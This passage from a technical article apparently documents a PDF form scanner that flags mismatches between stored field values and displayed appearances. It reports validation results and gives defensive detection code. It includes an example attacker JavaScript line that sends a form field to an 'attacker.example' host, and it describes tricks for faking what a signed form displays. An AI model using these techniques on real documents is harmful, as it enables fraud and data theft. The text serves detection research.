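        return False
    if not re.search(rb"/Action\s*/Include\b", sig_ref):
        return False
    fields = re.search(rb"/Fields\s*\[([^\]]*)\]", sig_ref)
    # An indirect /Fields reference (e.g. /Fields 12 0 R) is not resolved here.
    return fields is not None and fields.group(1).strip() == b""
```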

A note on the scores: the pure V/AP positives (01, 02, 03, 05, E4) carry no execution vector, so their threat score is 0; it is the Deception (content-integrity) axis that grades them, which is why each reads suspicious on its V/AP finding rather than being dismissed as low. The signature-tampering cases (07, E5) grade on the integrity portion of the threat axis, and 06 reaches high-risk through its OpenAction JavaScript chain. Production forms follow the same pattern: low or zero threat, with the V/AP checks silent unless value and appearance genuinely diverge.

Complete Corpus: False-Positive and False-Negative Testing

196 PDF files were submitted to the scanner across six categories: hand-crafted V/AP positive and negative test files, real-world US government tax and agency forms, US federal legislation, academic papers, and Corkami proof-of-concept adversarial files (deliberately malformed or structurally unusual PDFs used for PDF parser research). All 196 were successfully scanned (the blank-AP edge case that previously returned no usable response now scans cleanly and fires its V/AP indicator). All predictions for positive test files were stated before scanning.

Category	Files	Prediction	Result
Structural V/AP positive cases (hand-crafted)	9 scanned	V/AP indicator should fire	9 / 9 detected — 100%
Evasion: hex-encoded `/V` (E1)	1	Hex-decode handles this — should detect	Detected [HIGH] Value/Appearance Mismatch
Evasion: Unicode confusable in `/V` (E2)	1	Byte-level comparison catches it — should detect	Detected [HIGH] Value/Appearance Mismatch
Evasion: font encoding remap (E3)	1	Font glyph table now parsed — should detect	Detected [HIGH] Value/Appearance Mismatch — `/Encoding /Differences` resolved; rendered text 9200.00 vs `/V` 1200.00. Deception 75 → high-risk.
Hand-crafted clean controls (text, checkbox, listbox)	3	No V/AP indicator	0 / 3 false positives
Tool-generated clean PDFs (qpdf, pdflatex, wkhtmltopdf)	3	No V/AP indicator	0 / 3 false positives
IRS tax forms: 44 real AcroForm documents (W-9, W-4, 1040, 941, 1120, 1065, 433-A, 1099-NEC, and 36 others) with real JavaScript (field calculations), embedded files, XFA fields, and ObjStm. Under the multi-axis verdict these now correctly read low (threat 20–45): their JavaScript, embedded files and XFA are neutral form-authoring capability on the structural axis, not threat, and no V/AP indicator fires. (An earlier single-score model rated the same forms 328–486/“suspicious”; correcting that false elevation while keeping V/AP silent is exactly what the axis split achieves.)	44	No V/AP indicator	0 / 44 false positives
US agency forms (VA-10091, VA-40-1330)	2	No V/AP indicator	0 / 2 false positives
US federal legislation (GovInfo PDFs): Infrastructure Investment and Jobs Act, Consolidated Appropriations Act 2021, Tax Cuts and Jobs Act 2017, CARES Act	4	No V/AP indicator	0 / 4 false positives
Academic papers from arXiv: 29 documents, a range of 2023–2025 papers across CS, physics, and mathematics; standard pdflatex output, no AcroForms	29	No V/AP indicator	0 / 29 false positives
Corkami PDF PoC adversarial files: 102 deliberately malformed or structurally unusual PDFs (truncated xrefs, PDF version mismatches, orphaned objects, compressed object streams, JavaScript obfuscation, signature edge cases, encoding tricks) used for differential-parser research	102	No V/AP indicator	0 / 102 false positives
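The fix for E3 resolves the font's /Encoding /Differences array before comparing. A sketch of that resolution, with hypothetical names and a deliberately small glyph-name table (a full implementation would use the Adobe Glyph List and any /ToUnicode CMap). Codes not listed in /Differences are assumed to follow an ASCII-compatible base encoding. Remapping code 49, the byte for the digit 1, to the glyph /nine produces a discrepancy of the kind reported for E3.

```python
import re
from typing import Dict

# Small glyph-name table (assumption); a full implementation would consult
# the Adobe Glyph List and any /ToUnicode CMap.
GLYPH_TO_CHAR = {
    "zero": "0", "one": "1", "two": "2", "three": "3", "four": "4",
    "five": "5", "six": "6", "seven": "7", "eight": "8", "nine": "9",
    "period": ".", "comma": ",", "dollar": "$", "space": " ",
}


def parse_differences(body: bytes) -> Dict[int, str]:
    """Parse the inside of a /Differences array, e.g. b"49 /nine", into {code: glyph}."""
    mapping: Dict[int, str] = {}
    code = None
    for tok in re.findall(rb"/[^\s/\[\]<>()%{}]+|\d+", body):
        if tok.startswith(b"/"):
            if code is not None:
                mapping[code] = tok[1:].decode("latin-1")
                code += 1  # each following name takes the next code
        else:
            code = int(tok)
    return mapping


def render_with_differences(shown: bytes, differences: Dict[int, str]) -> str:
    """Map shown byte codes to characters; codes not remapped fall back to ASCII."""
    chars = []
    for code in shown:
        glyph = differences.get(code)
        chars.append(GLYPH_TO_CHAR.get(glyph, "?") if glyph else chr(code))
    return "".join(chars)
```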

Metric	Value	Scope caveat
V/AP detection rate	9 / 9 — 100%	All 9 positive cases scanned and detected (the blank-AP edge case now scans cleanly and fires its V/AP indicator); 0 false negatives after font-encoding-remap fix
False-positive rate	0 / 187 — 0.00%	Across 44 IRS forms, 2 agency forms, 4 federal publications, 29 arXiv papers, 102 Corkami PoC files, 6 hand-crafted and tool-generated clean controls
Confirmed false negatives	0	E3 font encoding remap was the only known FN; now detected after `/Encoding /Differences` glyph table resolution was added to AP text extraction
Evasion attempts tested	3 built and scanned; 1 additional structural test	E1 detected, E2 detected, E3 detected (after fix); image-based AP structurally detected (Do operator without text operators); whitespace normalisation and encrypted AP remain outside scope
Independent replication	None	All tests by the authors; test files and generation scripts available for independent replication

A noteworthy secondary finding concerns how those 44 IRS forms are scored overall. They carry JavaScript field-calculation objects, embedded file attachments, XFA form structures and ObjStm compressed object streams — all legitimate interactive-form authoring features. Under the multi-axis verdict these are classified as neutral capability on the structural axis, not threat, so all 44 forms now score low (threat 20–45) with zero V/AP indicators. An earlier single-score model summed those same features into 328–486 points and rated the forms suspicious, then relied on a special-case “form-document context gate” to walk the level back — a patch over a scoring model that conflated capability with threat. The axis split removes the need for that gate: presence of form JavaScript or embedded files no longer inflates the malware verdict in the first place, while the V/AP checks remain free to fire the instant a field’s value and appearance genuinely diverge. The checks correctly separate AcroForm field-value divergence (content integrity) from the active-content capability that legitimately authored government forms routinely carry.

The 102 Corkami PoC adversarial files include PDFs with intentionally broken structure: orphaned xref tables, version header mismatches across parsers, compressed object streams, obfuscated JavaScript, and signature edge cases. None triggered a V/AP indicator. The checks depend on AcroForm field structure, and the comparison checks additionally need a widget carrying both /V and /AP; that structure is absent from the deliberately minimal Corkami test files.

This is engineering validation on a controlled corpus, not a formal empirical study. The 0/187 false-positive rate covers 187 files across six distinct source categories; the 9/9 detection rate covers all scanned positive cases only. Neither figure generalises to the full population of PDF documents in production environments at scale. Academic validation would require a labelled corpus drawn from operational traffic, independent replication, and statistical significance analysis. That gap is real and is stated here rather than papered over.

Comparative Evaluation: Reference Tools vs. V/AP Checks

To provide context for what the structural checks contribute beyond what existing PDF libraries already expose, the core 11-file corpus (5 positive, 6 negative hand-crafted and tool-generated files) was evaluated against two reference implementations: pikepdf and pdfminer.six. These are production-quality PDF libraries widely used in security research and PDF processing pipelines. The 187-file false-positive corpus above provides the broader real-world negative coverage; the comparative evaluation uses the hand-crafted set where ground truth is unambiguous.

File	Expected	pikepdf v9.x (NeedAppearances + checkbox /V vs /AS only)	pdfminer.six v20251230 (field enumeration only)	This scanner (AP stream text extraction + all checks)
`01_need_appearances.pdf`	Positive	✓ Detected	✗ Missed	✓ Detected
`02_checkbox_vap_mismatch.pdf`	Positive	✓ Detected	✗ Missed	✓ Detected
`03_text_vap_mismatch.pdf`	Positive	✗ Missed	✗ Missed	✓ Detected
`05_missing_ap.pdf`	Positive	✗ Missed	✗ Missed	✓ Detected
`06_js_field_conditioning.pdf`	Positive	✗ Missed	✗ Missed	✓ Detected
`00_clean_match.pdf`	Negative	✗ No indicator	✗ No indicator	✗ No indicator
`00b_clean_checkbox.pdf`	Negative	✗ No indicator	✗ No indicator	✗ No indicator
`00c_clean_listbox_opt.pdf`	Negative	✗ No indicator	✗ No indicator	✗ No indicator
`C1_qpdf_generated.pdf`	Negative	✗ No indicator	✗ No indicator	✗ No indicator
`C2_pdflatex_clean.pdf`	Negative	✗ No indicator	✗ No indicator	✗ No indicator
`C3_wkhtmltopdf_invoice.pdf`	Negative	✗ No indicator	✗ No indicator	✗ No indicator

Method	Detection rate (5 positives)	FP rate (6 negatives)	What it can detect
pikepdf (direct library)	2 / 5 — 40%	0 / 6 — 0%	`/NeedAppearances true`; checkbox `/V` vs `/AS` key comparison. Cannot parse AP stream text operators.
pdfminer.six (direct library)	0 / 5 — 0%	0 / 6 — 0%	Field enumeration only. No V/AP comparison capability in the library API.
This scanner	5 / 5 — 100%	0 / 6 — 0%	All five checks: NeedAppearances, checkbox /AS, AP stream text extraction (Tj/TJ operators), blank AP, missing AP — plus `/Opt` export-value resolution and hex-string `/V` decoding.

pikepdf misses 03 because detecting it requires decompressing the /AP /N content stream, parsing its Tj/TJ operators, PDF-unescaping the strings, and comparing the result with /V. pikepdf supplies building blocks for this (stream decoding and pikepdf.parse_content_stream), but it performs no V/AP comparison, so detection means building on the library rather than just calling it. 05 (value with no /AP) and 06 (JavaScript field conditioning) fall outside the two checks implemented in the pikepdf evaluation. This is the implementation work documented in the “Five Structural Indicators” section.

Reproducible Methodology

The complete test procedure is reproducible from this description:

Corpus construction. Positive test files were built from raw PDF bytes by hand — a Python script emitting raw PDF tokens, not calling any PDF library. Each file targets exactly one structural condition. Negative files fall into six categories: hand-crafted clean PDFs; tool-generated PDFs (qpdf --generate-appearances, pdflatex, wkhtmltopdf); 44 US IRS tax forms and 2 US VA agency forms downloaded from their respective official government domains; 4 US federal legislative texts from GovInfo (govinfo.gov); 29 academic papers from arXiv; and 102 Corkami PDF proof-of-concept adversarial files from the corkami/pocs repository (deliberately malformed or structurally unusual PDFs used for PDF parser research). Evasion files used the same raw-byte method with targeted structural variations: hex-encoded /V, Unicode confusable characters, and a custom /Font with /Encoding /Differences remapping a digit glyph. All test files and generation scripts are available from the authors on request.
Scanner under test. HTTP POST to https://pqpdf.com/api.php with operation=pdf-scan and the PDF as a multipart file upload — the same endpoint that powers the interactive scanner at pqpdf.com. Response is JSON with an indicators array; each indicator has a key, risk level, and description.
Classification criterion. A file is classified as a V/AP positive detection if any indicator key contains one of the following scanner-specific strings (tight match against actual engine output): Value/Appearance, NeedAppearances, Has Value But No Appearance, Blank AP Stream, No Appearance Stream, Stored Appearance Streams Stale, Appearance State Mismatch. Generic terms such as “Mismatch” were excluded to avoid conflating V/AP results with unrelated differential-parser indicators (e.g. “PDF Version Mismatch”).
Reference tool evaluation. pikepdf evaluated programmatically: /NeedAppearances flag check + /FT /Btn fields /V vs /AS string comparison. pdfminer.six evaluated via field enumeration; no V/AP comparison available in the library API.
Prediction before scanning. For evasion files, the expected outcome (detected/not detected) was stated in the generation script comment before the file was submitted to the scanner.
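The classification criterion is mechanical enough to express in a few lines. The following JavaScript is a minimal sketch, not the harness used for this article: it assumes the response shape described above (an `indicators` array whose entries carry a `key`) and treats the match as case-sensitive. The names `scanPdf` and `isVapPositive`, and the multipart field name `file`, are hypothetical.

```javascript
// Key fragments from the classification criterion. Generic "Mismatch" is deliberately
// absent so that unrelated indicators such as "PDF Version Mismatch" do not count.
const VAP_KEY_FRAGMENTS = [
  'Value/Appearance',
  'NeedAppearances',
  'Has Value But No Appearance',
  'Blank AP Stream',
  'No Appearance Stream',
  'Stored Appearance Streams Stale',
  'Appearance State Mismatch',
];

// Hypothetical client (Node 18+ provides fetch, FormData and Blob globally).
// The multipart field name 'file' is an assumption; operation=pdf-scan is from the text.
async function scanPdf(bytes, filename) {
  const form = new FormData();
  form.append('operation', 'pdf-scan');
  form.append('file', new Blob([bytes], { type: 'application/pdf' }), filename);
  const res = await fetch('https://pqpdf.com/api.php', { method: 'POST', body: form });
  if (!res.ok) throw new Error(`scan failed: HTTP ${res.status}`);
  return res.json(); // assumed shape: { indicators: [{ key, ... }, ...] }
}

// A file is a V/AP positive if any indicator key contains one of the fragments.
function isVapPositive(response) {
  const indicators = Array.isArray(response && response.indicators) ? response.indicators : [];
  return indicators.some((ind) =>
    ind && typeof ind.key === 'string' &&
    VAP_KEY_FRAGMENTS.some((fragment) => ind.key.includes(fragment)));
}

console.log(isVapPositive({ indicators: [{ key: 'PDF Version Mismatch' }] }));      // false
console.log(isVapPositive({ indicators: [{ key: 'Value/Appearance Mismatch' }] })); // true
```

With a real file, `isVapPositive(await scanPdf(bytes, 'sample.pdf'))` would apply the same criterion to a live response.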

Normal Interactive PDFs vs. Suspicious Patterns

AcroForms, JavaScript, and automatic actions are standard PDF features used legitimately in millions of documents every day. A sign-and-submit button uses JavaScript. A government tax form uses an AcroForm with /SubmitForm. An e-signature platform uses DocMDP to certify the signed content. A mail-merge system may legitimately produce documents with /NeedAppearances true because it updates /V programmatically without regenerating /AP. None of that is inherently suspicious.

The checks in this article target a specific subset of structural conditions that are rarely present in legitimately authored documents and frequently present in documents where the display and data layers have been deliberately decoupled:

Feature	Normal use	Suspicious pattern
AcroForm + JavaScript	Field validation, conditional field visibility, submit-to-URL on a known endpoint	Field value read and posted to an external URL not visible in the document; conditional branch taken only when a specific field equals a pre-seeded value
`/NeedAppearances true`	Programmatic form fill where AP regeneration is deferred (e-signature platforms including DocuSign — observed behavior; mail merge)	`/NeedAppearances true` combined with a digital signature — displayed appearance is regenerated from `/V` at open time and is never the signed `/AP` stream; structural provenance of what is displayed and what is certified always differs
`/V` vs `/AS` on a checkbox	Should always match in a well-formed document	Structural mismatch: `/V /Yes` but `/AS /Off` — the stored value and displayed state disagree by construction
AP stream text vs `/V`	Should agree after `/Opt` export-value resolution	AP renders “Approved” while `/V` holds “Rejected”; or AP stream is blank while `/V` is non-empty
DocMDP P=1 + incremental update	DSS/LTV additions permitted under ISO 32000-2 §12.8.2.2	Incremental update containing form modifications, annotations, JavaScript, or OpenAction after a P=1 certifying signature

A scanner finding a V/AP mismatch is not saying “this form is dangerous.” It is saying the file contains a structural condition worth examining: the value stored in the file and the value the viewer renders do not agree and, in a signed document, that disagreement sits inside the certified byte range. Whether the cause is a buggy form authoring tool, a careless programmatic fill, or a deliberate manipulation is a question the indicator raises, not one it answers.

JavaScript Field-Value Conditioning: A Behavioral Analysis Gap

JavaScript behavioral emulation executes extracted PDF JavaScript in a sandboxed Node.js vm context with a stub of the Acrobat API. The gap documented here applies to any behavioral sandbox that does not seed doc.getField() with real /V values from the file — returning a stub { value: '' } for every field is the natural default when field enumeration and JS emulation run as independent passes without sharing state.

The practical consequence: when malicious JavaScript read a field value and acted on it (submitting it to a URL, using it in a conditional branch, passing it to app.launchURL()), the emulator captured any resulting event with an empty string rather than the actual content. Exploitation chains conditioned on field values were not followed correctly:

```javascript
// Attacker JS inside the PDF
if (doc.getField('status').value == 'approved') {
    app.launchURL('https://attacker.example/c2?v=' + doc.getField('amount').value);
}
```

With value: '', the condition '' == 'approved' is false — the branch is never taken, the LAUNCH_URL event is never emitted, and the emulator reports clean.

The correct approach: the AcroForm field enumeration pass collects a field_values map (field name → /V string) during widget traversal. The behavioral emulator reads this map and prepends const _pq_fv = {...}; to the stub before execution. doc.getField(name) returns the real value from the file; doc.numFields reflects the true field count. SUBMIT_FORM and LAUNCH_URL events carry the actual field content. Signature fields are excluded — their /V is a PKCS#7 blob, not a meaningful string.
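A minimal sketch of the seeding idea, assuming Node.js and a deliberately tiny Acrobat API stub (only `doc.getField`, `doc.numFields`, `doc.submitForm`, and `app.launchURL`). The prelude is built as `const _pq_fv = {...};` in the spirit of the description above; the `emulate` helper and the `_pq_seeded` and `_pq_events` names are hypothetical. Passing `null` reproduces the unseeded behaviour, so the same attacker script can be run both ways.

```javascript
const vm = require('vm');

// Run extracted PDF JavaScript against a minimal, hypothetical Acrobat API stub and
// return the recorded events. fieldValues maps field name -> /V string (signature
// fields are assumed to be excluded already); null mimics an unseeded emulator.
function emulate(script, fieldValues) {
  const events = [];
  const seeded = fieldValues !== null;
  const prelude = `
    const _pq_fv = ${JSON.stringify(fieldValues || {})};
    const _pq_seeded = ${seeded};
    const doc = {
      getField(name) {
        if (!_pq_seeded) return { value: '' };     // the unseeded default
        return Object.prototype.hasOwnProperty.call(_pq_fv, name)
          ? { value: _pq_fv[name] }
          : null;                                  // unknown field name
      },
      get numFields() { return Object.keys(_pq_fv).length; },
      submitForm(opts) { _pq_events.push({ type: 'SUBMIT_FORM', url: String(opts && opts.cURL) }); },
    };
    const app = {
      launchURL(url) { _pq_events.push({ type: 'LAUNCH_URL', url: String(url) }); },
    };
  `;
  // Fresh context per run; the timeout bounds runaway loops. Note that node:vm
  // isolates globals but is not, by itself, a hardened security boundary.
  vm.runInNewContext(prelude + script, { _pq_events: events }, { timeout: 1000 });
  return events;
}

const attackerJs = `
  if (doc.getField('status').value == 'approved') {
    app.launchURL('https://attacker.example/c2?v=' + doc.getField('amount').value);
  }
`;

console.log(emulate(attackerJs, null).length); // 0: branch never taken, reports clean
console.log(emulate(attackerJs, { status: 'approved', amount: '1200.00' })); // one LAUNCH_URL event
```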

DocMDP P=1 and DSS/LTV: What ISO 32000-2 Actually Permits

DocMDP P=1 means the certifying signature permits no modifications to the document whatsoever: not form fill-ins, not annotations, nothing. A naive implementation therefore flags any incremental object after a P=1 signature as a bypass attempt. The problem is that ISO 32000-2 explicitly carves out an exception, so such an implementation raises false positives on a large class of legitimately authored documents.

The relevant specification text is ISO 32000-2 §12.8.2.2 NOTE 2, which explicitly permits DSS (Document Security Store) and LTV (Long Term Validation) additions in an incremental update even under P=1.

DSS carries the material required to validate a digital signature long after the signing certificate’s OCSP responder or CRL distribution point may no longer be online: OCSP responses, certificate revocation lists, and the full certificate chain. Adding this material post-signing is a standard PAdES workflow; it does not modify the certified document content in any MDP sense. Under the naive rule, every legitimately LTV-enabled P=1 document was flagged critical.

The fix detects DSS-only incremental updates: the section contains /DSS or /VRI and has no execution vectors (no JavaScript, no /OpenAction), no annotations, no form elements, and no /AA additional actions. When P=1 and the incremental section is DSS-only, the scanner emits a low-severity informational note citing the spec section rather than a bypass finding. If DSS is mixed with any document modification or execution vector, the full bypass indicator fires as before.
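The DSS-only rule can be sketched as a token scan over one incremental section. This is an illustration under simplifying assumptions, not the scanner's implementation: the section is a latin1 string, no objects sit inside compressed object streams, and the blocker lists mirror the prose above. The names `classifyP1Update`, `hasName`, and `BLOCKERS` are hypothetical. One caveat a real implementation has to handle: adding /DSS requires rewriting the document catalog in the same update, so a catalog that already referenced /AcroForm would need to be compared with the previous revision rather than flagged by name, which this sketch does not do.

```javascript
// A PDF name ends at whitespace or a delimiter, so /JS must not match inside /JSX.
const NAME_END = '(?![^\\s()<>\\[\\]{}/%])';

function hasName(text, name) {
  return new RegExp('/' + name + NAME_END).test(text);
}

// Names whose presence disqualifies a section from the DSS-only exemption.
const BLOCKERS = {
  execution: ['JavaScript', 'JS', 'OpenAction', 'AA'],
  annotation: ['Annot', 'Annots'],
  form: ['AcroForm', 'Widget', 'FT'],
};

function classifyP1Update(sectionText) {
  const hasDss = hasName(sectionText, 'DSS') || hasName(sectionText, 'VRI');
  const found = [];
  for (const [group, names] of Object.entries(BLOCKERS)) {
    for (const name of names) {
      if (hasName(sectionText, name)) found.push(`${group}:/${name}`);
    }
  }
  // DSS material and nothing else: informational note citing ISO 32000-2 §12.8.2.2.
  if (hasDss && found.length === 0) return { verdict: 'dss-only', found };
  // Anything else after a P=1 signature keeps the full bypass finding.
  return { verdict: 'bypass', found };
}

console.log(classifyP1Update('<< /Type /Catalog /DSS 14 0 R >>').verdict); // dss-only
```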

Note on scope: FieldMDP and V/AP

Field MDP (FieldMDP, /TransformMethod /FieldMDP) is a distinct transform from DocMDP. Where DocMDP applies a permission level to the entire document, FieldMDP applies per-approval-signature constraints to named form fields, specifying which fields are locked and which are not. Both are detected separately. The DSS/LTV exemption applies to DocMDP P=1 only; FieldMDP constraint validation is unchanged.

FieldMDP is directly relevant to V/AP because it controls which specific field values fall within the coverage of an approval signature. An attacker can craft a FieldMDP that selectively excludes target fields, leaving their values modifiable post-signing while the document carries a valid signature. Three checks are applied: (1) Action=Include with an empty /Fields array: the signature appears to lock fields but locks none; (2) Action=Exclude with named fields: those fields are explicitly not locked, so they remain modifiable and susceptible to V/AP divergence after signing; (3) incremental updates containing /Widget or /AcroForm objects added after a FieldMDP signature: a potential constraint violation that validators handle inconsistently, because they differ on whether the names of modified fields are checked against the locked set.
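The three checks translate directly into code. A minimal sketch, assuming the signature's /TransformParams have already been parsed into a plain object (names without the leading slash) and that the raw text of each later incremental update is available; the input shapes and the `checkFieldMdp` name are hypothetical.

```javascript
// params mirrors the FieldMDP /TransformParams, e.g. { Action: 'Exclude', Fields: ['amount'] };
// laterSections holds the raw text of each incremental update written after the signature.
function checkFieldMdp(params, laterSections) {
  const findings = [];
  const fields = Array.isArray(params.Fields) ? params.Fields : [];
  // (1) Include with no fields: the signature appears to lock fields but locks none.
  if (params.Action === 'Include' && fields.length === 0) findings.push('include-empty');
  // (2) Exclude with named fields: those fields stay modifiable after signing.
  if (params.Action === 'Exclude') fields.forEach((name) => findings.push(`excluded:${name}`));
  // (3) Widget or AcroForm objects in a later incremental update.
  const formName = /\/(Widget|AcroForm)(?![^\s()<>\[\]{}\/%])/;
  laterSections.forEach((text, i) => {
    if (formName.test(text)) findings.push(`form-update:${i}`);
  });
  return findings;
}

console.log(checkFieldMdp({ Action: 'Exclude', Fields: ['amount'] }, [])); // one finding: excluded:amount
```

Check (3) only records that form objects appeared; deciding whether they touch a locked field is exactly where validators diverge, so the sketch leaves that judgment to review.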

Structural Limits: What Rasterisation Cannot Provide

There is a principled boundary for how far static V/AP analysis can go without rasterisation. Rasterising a field region and running Tesseract against it is technically possible. For deterministic, reproducible forensic analysis that must produce consistent results on the same file across runs, it is the wrong approach for reasons that are architectural, not merely practical.

The problems with rasterisation in this context:

Renderer-specific differences — MuPDF and Ghostscript render the same field differently
Font fallback differences — missing fonts produce different glyphs on different systems
DPI-dependent text segmentation — results change with render resolution
OCR nondeterminism — the same raster produces different strings across runs
Language-model bias — OCR engines correct toward plausible words, hiding injected content
False-positive rates that break the guarantees a forensics engine must provide
Unpredictable latency spikes on large form documents

Everything where V/AP divergence is provable from the raw byte stream (the cases where the file and the display disagree by construction) is covered by the five checks described above. Two cases remain that static analysis cannot fully resolve, plus one gap in empirical validation:

Encrypted fields. When the PDF is encrypted and field values or AP streams require a key to decrypt, static extraction of /V or AP content is not possible without the password. These checks apply to unencrypted or successfully decrypted content.
XFA rendering divergence. XFA forms render through a separate XFA engine in Acrobat, distinct from AcroForm rendering. V/AP analysis does not directly apply to XFA-native fields, which carry their own data/display separation in the XDP schema.
No broad corpus validation. See the “Validation Scope” subsection above. The empirical gap is acknowledged explicitly, not papered over.

Two evasion paths that were previously limitations are now detected: custom font encoding remaps are resolved via /Encoding /Differences table parsing before comparison; image-based AP streams are flagged structurally when a Do operator is present without text drawing operators (the actual image content cannot be compared without image recognition, but the structural anomaly is surfaced for manual review).
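The structural test behind the image-based and blank cases only needs the operator sequence of the decoded /AP /N stream. A minimal sketch, assuming the stream is already decompressed to a latin1 string; it counts Tj, TJ, ' and " as text-showing operators, ignores inline images (BI/ID/EI), and does not follow a Do into a form XObject that might itself draw text. The `operators` and `classifyAppearance` names and the category labels are hypothetical; `xobject-only` is used because Do can paint either an image or a form XObject.

```javascript
// Operators that show text in a content stream.
const TEXT_SHOW = new Set(['Tj', 'TJ', "'", '"']);

// Collect operator keywords from a decoded content stream, skipping operands
// (strings, hex strings, names, numbers, dictionaries) and comments.
function operators(content) {
  const ops = [];
  let i = 0;
  while (i < content.length) {
    const c = content[i];
    if (c === '(') {                                   // literal string, may nest
      let depth = 1;
      i++;
      while (i < content.length && depth > 0) {
        if (content[i] === '\\') i++;                  // skip the escaped character
        else if (content[i] === '(') depth++;
        else if (content[i] === ')') depth--;
        i++;
      }
    } else if (c === '<' && content[i + 1] === '<') { // dictionary open
      i += 2;
    } else if (c === '<') {                            // hex string
      const end = content.indexOf('>', i);
      i = end === -1 ? content.length : end + 1;
    } else if (c === '%') {                            // comment runs to end of line
      while (i < content.length && content[i] !== '\n' && content[i] !== '\r') i++;
    } else if (c === '/') {                            // name operand
      i++;
      while (i < content.length && !/[\s()<>\[\]{}\/%]/.test(content[i])) i++;
    } else if (/[A-Za-z'"]/.test(c)) {                 // operator keyword
      let j = i;
      while (j < content.length && /[A-Za-z0-9'"*]/.test(content[j])) j++;
      ops.push(content.slice(i, j));
      i = j;
    } else {
      i++;                                             // numbers, brackets, whitespace
    }
  }
  return ops;
}

function classifyAppearance(content) {
  const ops = operators(content);
  if (ops.some((op) => TEXT_SHOW.has(op))) return 'text';
  if (ops.includes('Do')) return 'xobject-only';       // structural flag for manual review
  return 'blank';                                      // no text drawn at all
}

console.log(classifyAppearance('q 18 0 0 18 0 0 cm /Im1 Do Q')); // xobject-only
```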

Adversarial Evasion Paths

An attacker who knows the detection logic can attempt to evade it. Being explicit about viable evasion paths is more useful than avoiding the topic:

Evasion technique	How it works	Detected?
Font encoding remap (E3)	AP stream has `(1200.00) Tj`; custom `/Font` maps glyph `0x31` (“1”) to the visual glyph for “9” via `/Encoding /Differences [49 /nine]`. Viewer renders 9200.00. Naive text extraction reads 1200.00 — matches `/V`. No mismatch without glyph table resolution.	Confirmed detected — `E3_font_remap_evasion.pdf` re-scanned after fix; [HIGH] Value/Appearance Mismatch fired. The scanner resolves `/Encoding /Differences` tables before comparison: byte 0x31 → glyph `/nine` → “9”, so rendered text 9200.00 is correctly compared against `/V 1200.00`. Deception 75 → high-risk.
Image-based AP (E4)	AP stream draws a rasterised image via `Do` operator with an XObject. `/V` holds text. No text operators to extract.	Structurally detected — `E4_image_ap_structural.pdf` scanned; [HIGH] “Image-Based Appearance Stream — V Not Visually Verifiable” fired. Deception 25 → suspicious. The actual image content cannot be compared to `/V` without image recognition, but the structural anomaly (Do present, no Tj/TJ) is deterministic and surfaced for manual review.
Unicode confusables (E2)	AP renders аpproved (Cyrillic U+0430 “а”); `/V` is `(approved)` (Latin “a”). Bytes differ; visual appearance is identical.	Confirmed detected — `E2_unicode_confusable.pdf` scanned; [HIGH] Value/Appearance Mismatch fired. Deception 25 → suspicious.
Hex-encoded `/V` (E1)	`/V <52656a6563746564>` encodes “Rejected”. Naive string comparison reads angle-bracket hex, not decoded text; mismatch against AP rendering “Approved” is missed.	Confirmed detected — `E1_hex_v_evasion.pdf` scanned; [HIGH] Value/Appearance Mismatch fired. Hex decode and UTF-16BE detection verified. Deception 25 → suspicious.
Whitespace normalisation tricks	AP renders `(Amount:  $1,200)` with a double space; `/V` is `(Amount: $1,200)`. After whitespace normalisation the strings match, so no mismatch is flagged.	No, by design: genuine whitespace variance is common in legitimately authored forms, and flagging it would produce false positives on real documents.
Encrypted AP stream	PDF is encrypted; AP decompression requires the document key. Without the password, AP content is inaccessible.	No — acknowledged; checks apply only to unencrypted or decrypted content.
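The glyph-table step behind the E3 result can be sketched as follows. The sketch assumes the /Differences array has already been parsed into numbers and glyph names (without slashes), treats the base encoding as ASCII (which holds for digits in StandardEncoding and WinAnsiEncoding), and uses a tiny glyph-name table where a real resolver would use the full Adobe Glyph List. The `differencesMap` and `renderedText` names are hypothetical.

```javascript
// Tiny, hypothetical subset of glyph names -> characters.
const GLYPH_TO_CHAR = new Map(Object.entries({
  zero: '0', one: '1', two: '2', three: '3', four: '4',
  five: '5', six: '6', seven: '7', eight: '8', nine: '9',
  period: '.', comma: ',', space: ' ',
}));

// /Differences [49 /nine] means code 49 (0x31) now draws the glyph /nine. A number sets
// the next code; each following glyph name is assigned to consecutive codes.
function differencesMap(differences) {
  const map = new Map();
  let code = 0;
  for (const item of differences) {
    if (typeof item === 'number') code = item;
    else map.set(code++, item);
  }
  return map;
}

// Map each byte of a shown string to the character the viewer draws. Codes without a
// remap, or remapped to a glyph missing from the table, fall back to the byte itself.
function renderedText(bytes, differences) {
  const remap = differencesMap(differences);
  let out = '';
  for (const ch of bytes) {
    out += GLYPH_TO_CHAR.get(remap.get(ch.charCodeAt(0))) ?? ch;
  }
  return out;
}

const drawn = renderedText('1200.00', [49, 'nine']); // operand of (1200.00) Tj
console.log(drawn);               // 9200.00
console.log(drawn !== '1200.00'); // true: differs from /V (1200.00)
```

Comparing `drawn` rather than the raw operand bytes against /V is what turns the E3 evasion into an ordinary Value/Appearance mismatch.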

Font encoding remap and image-based AP were previously undetectable evasion paths; both are now addressed. Font encoding is resolved via glyph table lookup before comparison; image-based AP is flagged structurally so it reaches manual review. Encrypted AP and XFA rendering remain outside static analysis scope: closing them would require the document key, a full rendering engine, or both, and neither gap is addressable with static byte-stream inspection alone.

An Open Question: DocMDP P=2 and Incremental Form Fill-ins

DocMDP P=2 permits form fill-ins and digital signatures but prohibits any other modification. The interaction between P=2 and incremental form fill-ins is not fully settled. The specific edge case: a viewer that fills a form field incrementally under P=2, updating /V in the incremental section, is permitted. Whether a viewer that also regenerates the /AP stream in the same incremental section is making a permitted modification depends on whether the validator treats AP regeneration as a document change.

The practical consequence: a certified P=2 document could have been legitimately filled, producing an incremental /AP update that some validators accept and others reject. A conservative implementation flags all incremental object additions under P=2 that contain form elements as potential violations. Whether a specific update is legitimate depends on whether it was generated by a compliant form-fill operation or by an attacker modifying fields outside the permitted scope. This is a known nuance, not a confirmed false positive, and the spec does not resolve it unambiguously.

Current scanner behaviour: All incremental updates that contain form elements (/Widget annotations or /AcroForm entries) under a P=2 DocMDP constraint are flagged as potential constraint violations. This is intentionally conservative: the flag surfaces the condition for manual review. Whether a specific incremental update represents a legitimate form fill-in or an out-of-scope modification requires context that static analysis alone cannot determine. Corpus data: 1 of 196 scanned files triggered a FieldMDP Bypass indicator, a US congressional bill (BILLS-116s3548is, US Senate 116th Congress) that carries incremental updates containing form elements after a FieldMDP signature; it scored 601 and is a false positive. All 44 IRS forms and both VA agency forms produced zero MDP bypass indicators.

Safe Handling and Configuration

The technical findings above have practical consequences for anyone who receives, processes, or routes PDF forms. These are not theoretical edge cases — they apply to signed contracts, regulatory filings, and any workflow where a PDF form value is treated as authoritative.

